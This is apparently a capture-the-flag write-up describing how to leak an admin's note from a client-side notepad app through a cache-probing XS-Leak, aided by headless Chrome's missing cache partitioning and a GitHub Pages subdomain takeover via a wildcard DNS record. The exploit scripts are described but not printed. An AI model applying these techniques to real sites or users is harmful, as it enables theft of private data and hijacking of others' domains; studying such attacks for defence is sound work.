yana
GitHub Pages subdomain takeover and cache probing XS-Leak
Last updated
GitHub Pages subdomain takeover and cache probing XS-Leak
Last updated
I made a note taking website. Can you get the admin's note?
https://chal.yana.wtf
admin bot nc yana-bot.chal.uiuc.tf 1337
author: arxenix
This challenge was really great, even though there was an unintended solution. It took me on quite the journey, learning about cache probing attacks and subdomain takeovers.
The unintended solution stems from how Chrome handles cache partitioning. While Chrome version 85 onwards supports cache partitioning, effectively isolating caches by the requesting origin, running Chrome in headless mode does not achieve the same effect.
While not required to solve the challenge, figuring out the intended solution - a GitHub Pages subdomain takeover - was definitely an awesome experience.
This is a notepad app that functions entirely on the client-side. We can therefore analyze the JavaScript source code to look for vulnerabilities.
The app uses the browser's local storage to store the user's notes.
We can see this in action using Chrome DevTools.
There is also a search feature that "searches" for notes. Interestingly, the search query gets placed into the URL's fragment identifier through document.location.hash
.
The search is implemented through the search function. The search function grabs the URL's fragment identifier, and checks if it is a substring of the note stored in the browser's local storage.
If the query is a valid substring, then the green https://sigpwny.com/uiuctf/y.png
image is loaded and placed in the output
div.
If the query is not found, the red https://sigpwny.com/uiuctf/n.png
is loaded instead.
We are also provided with the bot.js
script, which is the "admin" bot that visits any URL we give it. Notice that the flag is first saved as a note on the challenge server before our chosen URL is visited.
Now, we know that:
We are able to force the admin to visit the challenge server with any arbitrary fragment identifier, either directly (through submitting the challenge server URL to the bot) or indirectly (through JavaScript or iframes on our hosted site).
This will allow us to make the admin's browser perform the search function, checking whether the provided fragment identifier is a substring of the flag.
At this point, I knew that it must have had something to do with brute-forcing the flag. However, since the search is performed on the client-side, we couldn't simply do a CSRF to get the search output.
Remember how y.png
and n.png
images are loaded based on the search output?
Perhaps we can perform a cache probing attack to determine whether the search was successful. The principle is as follows:
The victim visits the attacker-controlled site. The attacker-controlled site loads an iframe of the notes site, with a search query. If the search query is a substring of the flag, then the https://sigpwny.com/uiuctf/y.png
image is fetched and cached.
The attacker-controlled site fetches the https://sigpwny.com/uiuctf/y.png
image.
By calculating the time taken to fetch the image, the attacker-controlled site can determine whether the image was cached (the time taken would be significantly lower).
This would allow us to brute-force the flag character by character.
To implement the cache probing attack, we need to come up with a JavaScript payload that would be run on the victim's browser to determine whether the image was cached.
We define an onFrameLoad()
function that will be called when the iframe of the notes site, containing the search query, is loaded.
We then prepare a template.html
with a placeholder for the search query.
Then, an exploit.py
script can automate the bruteforce attack.
We will have to run this script for each new character, adding the previously found ones to the FLAG
variable. (Perhaps I should have wrote a cleaner solution?)
Here's why. I was hosting the exploit on an ngrok
domain, but as of Chrome version 85, cache partitioning was implemented to defend against cache probing attacks. This update by Google in October 2020 explains how the new cache partitioning system works.
In brief, a new "Network Isolation Key" was added, which contains both the top-level site and the current-frame site. This allows the iframe's cache to be seperate from the top-level site's cache. The following example illustrates our attack scenario.
The initial fetching of the image through the notes application iframe should have resulted in a cache key of (attacker-site
, notes-app-site
, image-url
)
The second time the image is fetched through the attacker-controlled site, the cache key would not contain the notes application site, and would instead be (attacker-site
, attacker-site
,image-url
).
This should not result in a cache hit, since the two cache keys are different. But it did. After some local testing, I found that headless chrome simply doesn't perform cache partitioning.
I ran the admin bot in headless mode (the default) as follows:
The attack worked. Cache partitioning was not enabled.
But running the bot with headless mode disabled, the attack did not work.
This was the expected result, since cache partitioning should be enabled by default.
We can verify that both times, y.png
was downloaded from the network, not fetched from the cache!
Assuming that cache partitioning worked, how could we bypass it?
An important implementation detail is that subdomains and port numbers are actually ignored when creating the cache key.
So when the image is requested by https://chal.yana.wtf/
, only https://yana.wtf/
is actually saved in the cache key. This means that if we are able to control any *.yana.wtf
subdomains, we would be able to bypass the cache partitioning since both requests would be originating from the same domain.
From the whois
records, we could tell that this was a GitHub Pages site.
I did not know this, but GitHub does not require you to prove that you actually own the domain before allowing you to setup a custom domain for your GitHub Pages site.
This opens up several possibilities for subdomain takeovers. As warned by the official documentation, a wildcard DNS record that points any subdomain to GitHub is especially dangerous.
A subdomain takeover can occur when there is a dangling DNS entry. Let me explain.
Using the dig
command, we can find the DNS records configured for chal.yana.wtf
.
An A
record maps the domain to the GitHub pages server.
But if we poke around a little more, we find that the DNS configuration indeed seems to use a wildcard A
record for *.yana.wtf
. For instance, a.yana.wtf
and b.yana.wtf
do not have any GitHub page associated with them, yet point to the GitHub pages server.
Going to http://a.yana.wtf
, therefore, will still forward the request to GitHub. GitHub looks for GitHub repositories with the appropriate CNAME
file. Since no repository is configured to serve a.yana.wtf
, a 404 page is shown.
This is a dangling DNS record, since anyone with a GitHub account can add the CNAME
file containing a.yana.wtf
to their repository, thereby taking over the a.yana.wtf
domain.
With the exploit scripts we created earlier, we can create our own GitHub Pages site.
We configure the custom domain to abc.yana.wtf
, which creates the following CNAME
file in our repository.
Now, if we go to http://abc.yana.wtf
, we will find that our exploit is being served!
Now, things are a little different. Because both the iframe and the top-level site are in the same yana.wtf
domain, Chrome does not partition the cache. Notice that the first request, initiated by the iframe, fetched y.png
from the network, while the second request, initiated by our exploit script, fetched y.png
from the browser's cache.
This obviously causes a significant difference in the time taken to fetch the resources, allowing us to carry out the cache probing attack even when Chrome's cache partitioning policy is in effect.
As a sanity check, I ran the bot again locally without headless mode, this time providing it the https://abc.yana.wtf/exploit.html
URL.
I confirmed that the exploit worked. Our exploit script determined that y.png
was cached, and made a callback to our ngrok
server with the successful query.